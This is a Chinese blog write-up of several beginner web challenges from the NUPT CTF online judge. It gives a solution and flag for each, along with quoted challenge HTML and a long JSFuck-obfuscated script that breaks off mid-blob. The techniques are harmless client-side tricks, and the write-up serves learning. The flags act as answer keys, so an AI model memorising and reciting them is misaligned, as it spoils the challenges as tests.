[南邮OJ]Web

2018-01-31 本文已影响286人 JasonChiu17

签到2

地址：来源：网络攻防大赛

说了输入zhimakaimen，开始输入没认真看，只能输入10个数字，可是zhimakaimen是十一个字符，后来审查元素才发现的。
修改maxlength就可以了
flag is:nctf{follow_me_to_exploit}

这题不是WEB

真的，你要相信我！这题不是WEB
传送门：题目地址.

是一个gif动图，下载下来用01editor打开，拉到最后。
nctf{photo_can_also_hid3_msg}

层层递进

黑客叔叔p0tt1的题目
欢迎大家关注他的微博~
题目传送门:题目地址

是个网页，懵逼，查看源代码咯。

<pre id="line1"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  <html xmlns="http://www.w3.org/1999/xhtml">  <head>  <meta http-equiv="Content-Type" content="text/html; charset=gb2312" />  <title>SuperSo | by:p0tt1</title>  <meta name="keywords" content="SuperSo | by:p0tt1">  <meta name="Description" content="SuperSo | by:p0tt1" />  <!-- css,js -->  <style type="text/css"> *{margin:0;padding:0;}
body{background:#FFFFFF;font-size:12px;font-family:"微软雅黑";#666}

.course{width:1024px;height:680px;margin:30px auto;}
.course .course_box{width:255px;height:155px;background:#FFCC66;float:left;margin-left:1px;
    cursor:pointer;margin-bottom:20px;color:#fff;position:relative;
}
.course .course_box h3{font-size:24px;font-weight:300;text-align:center;margin-top:63px;}
.course .course_box p{width:255px;height:155px;position:absolute;left:0;top:0;padding:10px;background:#000;opacity:0.5;
                        filter:alpha(opacity=50);display:none;  
}
.course .course_box p span{display:block;margin-top:2px;padding:2px;}
.course .course_box p .course_title{font-size:22px;}
.course .tz_blue{background:#2d8af1;}
.course .tz_red{background:#D44825;}
.course .tz_gray{background:#666;}
.course .tz_org{background:#ff6e1a;}
.course .tz_lv{background:#0cc5e7;}
.course .tz_qing{background:#64d500;}
.course .tz_yellow{background:#d5c300;} 
.course .tz_blue{background:#2d8af1;}
.course .tz_bluees{background:#2a45f1;}
.course .tz_redd{background:#D44835;}
.course .tz_grayy{background:black;}
.course .tz_orgg{background:#ff6e4a;}
.course .tz_lvv{background:#0cc5a7;}
.course .tz_qingg{background:#64c500;}
.course .tz_yelloww{background:#d45300;}
.course .tz_bluee{background:#2ddff1;} 
</style>  
<link href="[css/animate.min.css](view-source:http://chinalover.sinaapp.com/web3/css/animate.min.css)" rel="stylesheet" type="text/css">
</link>  
</head>  
<body>  
<body style="overflow:auto;">  
<iframe runat="server" src="[SO.html](view-source:http://chinalover.sinaapp.com/web3/SO.html)" width="100%" height="237" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no" allowtransparency="yes">
</iframe>  
<iframe runat="server" src="[http://www.lunzhiyu.com](view-source:http://www.lunzhiyu.com/)" width="100%" height="3800" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no" allowtransparency="yes">
</iframe> 
</body>  
</html>
</pre>

代码里有个iframe比较显眼，而且他的属性值也很奇怪，不是0就是no，想到题目层层递进，相比信息都藏在iframe里面的src吧，尝试点iframe里的src，尝试发现，只有第一个S0.html有信息，第二个iframe的http://www.lunzhiyu.com没有信息，于是一直点进去第一个iframe。
多次点击之后，得到：

<pre id="line1"><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">  <HTML><HEAD><TITLE>有人偷偷先做题，哈哈飞了吧？</TITLE>  <META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312">  <STYLE type="text/css"> BODY { font: 9pt/12pt 宋体 }
  H1 { font: 12pt/15pt 宋体 }
  H2 { font: 9pt/12pt 宋体 }
  A:link { color: red }
  A:visited { color: maroon } </STYLE>  </HEAD><BODY>  <center>  <TABLE width=500 border=0 cellspacing=10><TR><TD>  <!-- Placed at the end of the document so the pages load faster -->  <!--  
<script src="./js/jquery-n.7.2.min.js"></script>
<script src="./js/jquery-c.7.2.min.js"></script>
<script src="./js/jquery-t.7.2.min.js"></script>
<script src="./js/jquery-f.7.2.min.js"></script>
<script src="./js/jquery-{.7.2.min.js"></script>
<script src="./js/jquery-t.7.2.min.js"></script>
<script src="./js/jquery-h.7.2.min.js"></script>
<script src="./js/jquery-i.7.2.min.js"></script>
<script src="./js/jquery-s.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-i.7.2.min.js"></script>
<script src="./js/jquery-s.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-a.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-f.7.2.min.js"></script>
<script src="./js/jquery-l.7.2.min.js"></script>
<script src="./js/jquery-4.7.2.min.js"></script>
<script src="./js/jquery-g.7.2.min.js"></script>
<script src="./js/jquery-}.7.2.min.js"></script>
-->  
<p>来来来，听我讲个故事：</p>  
<ul>  
<li>从前，我是一个好女孩，我喜欢上了一个男孩小A。</li>  
<li>有一天，我终于决定要和他表白了！话到嘴边，鼓起勇气... </li>  
<li>可是我却又害怕的<a href="javascript:history.back(1)">后退</a>了。。。</li>  
</ul>  <h2>为什么？
<br>为什么我这么懦弱？</h2>  
<hr>  
<p>最后，他居然向我表白了，好开森...说只要骗足够多的笨蛋来这里听这个蠢故事浪费时间，</p>  
<p>他就同意和我交往！</p>  
<p>谢谢你给出的一份支持！哇哈哈\(^o^)/~！</p>  
</TD></TR></TABLE>  
</center>  
</BODY></HTML></pre>

仔细看js代码，藏的够深的啊。

nctf{this_is_a_fl4g}
后记：
抓包或者查看元素的网络可以看到404.html，打开查看源码即可。

单身二十年

这题可以靠技术也可以靠手速！
老夫单身二十年，自然靠的是手速！
题目地址：撸了他！

点进去发现有页面跳转了,页面显示：
这里真的没有KEY，土土哥哥说的，土土哥哥从来不坑人，PS土土是闰土，不是谭神
查看首页源码：view-source:http://chinalover.sinaapp.com/web8/

<pre id="line1"><html>  
<head>  
<meta http-equiv="content-type" content="text/html;charset=utf-8">  
</head>  
<body>  
<a href="[./search_key.php](view-source:http://chinalover.sinaapp.com/web8/search_key.php)">_到这里找key__</a>  
</body>  
</html>
</pre>

点进去./search_key.php

<script>window.location="./no_key_is_here_forever.php"; </script>
key is : nctf{yougotit_script_now}
- nctf{yougotit_script_now}
___

综合题

题目地址：tip:bash

打开发现是jsfuck码
呀！这到底是什么玩意儿
[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]](({}[[]]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+!![]+!![]+!![]+!![]+[])+({}[[]]+[])[!![]+!![]])+(!![]+[])[!![]+!![]+!![]]+({}[[]]+[])[+!![]]+(!![]+[])[+[]]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+[])+(!![]+[])[!![]+!![]+!![]])+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+[]))+(!![]+[])[+!![]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[!![]+!![]+!![]]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[]))+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+[])+(!![]+!![]+[]))+(+!![]+[])+({}+[])[!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+({}+[])[!![]+!![]]+(!![]+!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+[])+(![]+[])[+[]]+(!![]+!![]+!![]+!![]+!![]+!![]+[])+(!![]+!![]+[])+(!![]+!![]+!![]+[])+({}+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(!![]+!![]+[])+(![]+[])[+!![]]+(![]+[])[+!![]]+(![]+[])[+[]]+(!![]+!![]+!![]+!![]+!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(!![]+!![]+[])+(!![]+!![]+!![]+!![]+[])+(![]+[])[+[]]+({}[[]]+[])[!![]+!![]]+(!![]+!![]+!![]+[])+({}+[])[!![]+!![]]+(+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[